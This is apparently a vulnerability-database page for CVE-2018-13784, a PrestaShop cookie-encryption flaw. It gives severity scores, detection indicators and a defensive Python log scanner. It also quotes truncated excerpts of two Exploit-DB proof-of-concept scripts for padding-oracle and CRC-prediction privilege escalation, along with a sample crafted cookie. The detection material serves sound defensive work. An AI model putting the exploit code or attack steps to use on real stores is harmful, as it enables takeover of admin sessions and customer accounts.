CVE-2018-13784
Published 2018-07-09

CVE-2018-13784: PrestaShop before 1.6.1.20 and 1.7.x before 1.7.3.4 mishandles cookie encryption in Cookie.php, Rinjdael.php, and Blowfish.php.
Priority P267 · Severity critical · CVSS 3.0 base score 9.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)
Exploit: available
EPSS: 16.67% (96.6th percentile)
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| prestashop | prestashop | < 1.6.1.20 | 1.6.1.20 |
| prestashop | prestashop | >= 1.7.0.0 < 1.7.3.4 | 1.7.3.4 |
Detection & IOCs (extracted from sources)

Cookie (name and value as used in the PoC): PrestaShop-b0ebb4f17b3e451202e5b044e29ed75d=20NxjuYuGVhSt8n0M54Av9Qkpyzl9axkK%2BGgLLCcv0MLQZhLAEV8lnq6U2Ew2n5aMUOYqkrkpqjputuLiBEqqW7pIce8cUv%2F3SEFp3tPnWfCgJgXKUsR1htOQ4KAoXyYLhoc31kVgcm39OhQh5Zg3A78HnO1On2udHwN8dTRdI86kewEFZPNtmMeBF7sAr9zezevsjK1VU4BI84EVXCYQuuhnVehoqfAa9XoZC%2FD3FEmDSuspZw2AUB0S7Py6ks6eEeCVDWieBKDsHD13UK%2FzgM%2F65m5rpU1P4BSQSHN2Qs%3D000208

- Detect a padding-oracle attack against PrestaShop AES-CBC cookies: look for repeated requests to the admin login endpoint with varying cookie values (base64-encoded blobs with a 6-digit numeric suffix), where HTTP 302 redirects to AdminLogin serve as the padding-oracle signal.
- PrestaShop session cookies exploited in this CVE follow the naming pattern 'PrestaShop-<md5hash>'; monitor for cookies matching this pattern being submitted with anomalous base64 payloads (especially payloads with an appended 6-digit size suffix).
- Detect the exploit stage in which the attacker posts to /index.php with 'recover_cart' and 'token_cart' parameters to hijack a customer cart and escalate to an employee/admin session.
- Monitor for high-frequency requests to the PrestaShop admin endpoint (e.g. /index.php, /pdf.php) with rapidly changing cookie values from the same source IP; this pattern is characteristic of automated padding-oracle or CRC brute-force enumeration.
- The exploit appends a 6-digit numeric suffix to the base64-encoded cookie value to encode the cookie size; treat a PrestaShop cookie whose URL-decoded value ends in a 6-digit decimal string with nothing after it as a malformed/exploit-crafted cookie indicator.
- The block size for the AES-CBC padding oracle is 16 bytes; the Blowfish/Rijndael variant uses SIZE_BLOCK=8. Anomalous cookie lengths that are exact multiples of 8 or 16 bytes (after base64 decoding, minus the 6-digit suffix) should be flagged.
- The exploits target PrestaShop versions before 1.6.1.20 and 1.7.x before 1.7.3.4; the AES-CBC padding-oracle PoC (EDB-45046) specifically targets <= 1.6.1.19 using openssl_encrypt(), while EDB-45047 targets the Blowfish/Rijndael path with an 8-byte block size.
- The padding-oracle detection relies on distinguishing HTTP 302 redirects to 'AdminLogin' (padding failure) from other responses (padding success); WAF/IDS rules should account for this redirect-based oracle rather than inspecting request bodies alone.
- The exploit requires the attacker to already hold a valid authenticated session (employee or customer) in order to obtain an initial encrypted cookie value before launching the padding-oracle or CRC-prediction attack.
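The indicators above (the 'PrestaShop-<md5hash>' cookie name, the trailing 6-digit size suffix, a decoded length that is a whole number of 8- or 16-byte blocks, and one client cycling many distinct cookie values into 302 responses) can be checked together by a small log scanner. The following is an added example written here for illustration, not code from the Exploit-DB PoCs or from the PrestaShop project. It assumes a simplified access-log format (`ip method path status "cookie header"`), a constructed six-line sample, 48-byte filler ciphertexts, the cookie name from the IOC above, and an alert threshold of four distinct cookie values per source IP and path; all of those are assumptions, not values from the advisory.

```python
import base64
import re
import urllib.parse
from collections import defaultdict

# Cookie name shape from the IOC notes: 'PrestaShop-' followed by an MD5 hex digest.
COOKIE_NAME_RE = re.compile(r"^PrestaShop-[0-9a-f]{32}$")
# Exploit-crafted values: a base64 blob immediately followed by a 6-digit decimal size suffix.
CRAFTED_VALUE_RE = re.compile(r"^(?P<blob>[A-Za-z0-9+/]+={0,2})(?P<size>[0-9]{6})$")
# Blowfish/Rijndael path: 8-byte blocks; AES-CBC path: 16-byte blocks.
BLOCK_SIZES = (8, 16)
# Distinct cookie values per (source IP, path), all answered with 302, before alerting.
ORACLE_THRESHOLD = 4  # assumed tuning value, not from the advisory


def parse_cookie_header(header):
    """Split a raw Cookie header into (name, value) pairs; values are URL-decoded."""
    pairs = []
    for part in header.split(";"):
        if "=" not in part:
            continue
        name, value = part.strip().split("=", 1)
        pairs.append((name, urllib.parse.unquote(value)))
    return pairs


def analyze_cookie_value(value):
    """Classify one URL-decoded PrestaShop cookie value.

    Returns (crafted, decoded_len). crafted is True when the value ends with the
    6-digit suffix and the base64 blob before it decodes to a whole number of
    8- or 16-byte cipher blocks, which is the shape the PoC cookies have.
    """
    m = CRAFTED_VALUE_RE.match(value)
    if not m:
        return False, None
    try:
        raw = base64.b64decode(m.group("blob"), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False, None
    block_aligned = any(len(raw) % size == 0 for size in BLOCK_SIZES)
    return block_aligned, len(raw)


def scan_log(lines):
    """Scan log lines of the assumed form: ip method path status "cookie header".

    Returns (crafted_hits, oracle_sources): one tuple per crafted-looking cookie,
    and the (ip, path) pairs that cycled ORACLE_THRESHOLD or more distinct
    PrestaShop cookie values into HTTP 302 responses.
    """
    crafted_hits = []
    values_seen = defaultdict(set)
    for line in lines:
        ip, _method, path, status, cookie_header = line.split(" ", 4)
        for name, value in parse_cookie_header(cookie_header.strip('"')):
            if not COOKIE_NAME_RE.match(name):
                continue
            crafted, decoded_len = analyze_cookie_value(value)
            if crafted:
                crafted_hits.append((ip, path, name, decoded_len))
            if status == "302":
                values_seen[(ip, path)].add(value)
    oracle_sources = sorted(k for k, v in values_seen.items() if len(v) >= ORACLE_THRESHOLD)
    return crafted_hits, oracle_sources


# --- constructed sample data (not real traffic) ---
SAMPLE_NAME = "PrestaShop-b0ebb4f17b3e451202e5b044e29ed75d"  # cookie name from the IOC above


def make_crafted_value(seed, nbytes):
    """PoC-shaped value: base64 of nbytes filler bytes plus a 6-digit size suffix."""
    return base64.b64encode(bytes([seed]) * nbytes).decode() + "%06d" % nbytes


def make_benign_value():
    """A plausible legitimate value: base64 with '=' padding and no numeric suffix."""
    return base64.b64encode(b"benign-session-value-here!").decode()


SAMPLE_LOG = [
    # one client cycling five different crafted cookies into 302s at an admin endpoint
    '203.0.113.5 GET /admin-dir/index.php 302 "%s=%s"'
    % (SAMPLE_NAME, urllib.parse.quote(make_crafted_value(i, 48), safe=""))
    for i in range(5)
] + [
    '198.51.100.7 GET /index.php 200 "PHPSESSID=abc123; %s=%s"'
    % (SAMPLE_NAME, urllib.parse.quote(make_benign_value(), safe="")),
]

if __name__ == "__main__":
    hits, sources = scan_log(SAMPLE_LOG)
    for hit in hits:
        print("crafted cookie:", hit)
    for src in sources:
        print("possible padding-oracle client:", src)
```

The suffix check alone would misfire on a legitimate base64 value that happens to end in six digits, so the block-alignment and the per-client 302 counting are combined before alerting; a real deployment would key the counter on a time window rather than on the whole file.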
CVSS provenance

- NVD, CVSS v3.0: 9.1 CRITICAL, vector CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
- NVD, CVSS v2.0: 6.4 MEDIUM, vector AV:N/AC:L/Au:N/C:P/I:P/A:N
No detection rules found.
Exploit-DB: PrestaShop < 1.6.1.19 - 'BlowFish ECD' Privilege Escalation (exploitdb, 2018-07-16)
```python
#!/usr/bin/env python3
# PrestaShop 0:
# (listing truncated in the source: the PoC header and the start of the
#  function enclosing the next lines are missing)
        offset -= SIZE_BLOCK
    return [
        '%06d' % (len(blocks) * SIZE_BLOCK + offset)
    ]


def xor(a, b):
    """XORs two strings and returns the result as bytes.
    """
    return bytes(x ^ y for x, y in zip(a.encode(), b.encode()))


def pb(n, z=False):
    """Returns the padding required to align n with SIZE_BLOCK, and its position
    in blocks. The z flag indicates if padding can be zero.
    """
    padding = (- n) % SIZE_BLOCK
    if z and padding == 0:
        padding = SIZE_BLOCK
    block = (n + padding) // SIZE_BLOCK
    return padding, block


crc32 = binascii.crc32
SIZE_BLOCK = 8
BASE_BYTE = '`'
SIZE_LASTNAME_TO_FIRSTNAME = bl(
    '¤customer_firstname|'
)
SIZE_FIRSTNAME_TO_PASSWD = bl(
    '¤logged|1¤is_guest|¤passwd|'
)
SIZE_FIRSTNAME_TO_EMAIL = SIZE_FIRSTNAME_TO_PASSWD + bl(
    '86df199881eaf8e
# (listing truncated here in the source)
```
Exploit-DB: PrestaShop < 1.6.1.19 - 'AES CBC' Privilege Escalation (exploitdb, 2018-07-16)
```python
#!/usr/bin/env python3
# PrestaShop <= 1.6.1.19 AES (Rijndael) / openssl_encrypt() Cookie Read
# Charles Fol
#
# See https://ambionics.io/blog/prestashop-privilege-escalation
#
# This POC will reveal the content of an employee's cookie.
# By modifying it one can read/write any PrestaShop cookie.
# It is a simple padding oracle implementation.
#
import requests
import urllib.parse
import base64

s = requests.Session()
"""
s.proxies = {
    'http': 'localhost:8080',
    'https': 'localhost:8080',
}
#"""

# Login as an employee, get your cookie and paste it here along with the URL
URL = "http://vmweb5/prestashop/admin177chuncw/"
cookie = "PrestaShop-b0ebb4f17b3e451202e5b044e29ed75d=20NxjuYuGVhSt8n0M54Av9Qkpyzl9axkK%2BGgLLCcv0MLQZhLAEV8lnq
# (listing truncated here in the source)
```
No writeups or analysis indexed.
References

- http://build.prestashop.com/news/prestashop-1-7-3-4-1-6-1-20-maintenance-releases/
- https://github.com/PrestaShop/PrestaShop/pull/9218
- https://github.com/PrestaShop/PrestaShop/pull/9222
- https://www.exploit-db.com/exploits/45046/
- https://www.exploit-db.com/exploits/45047/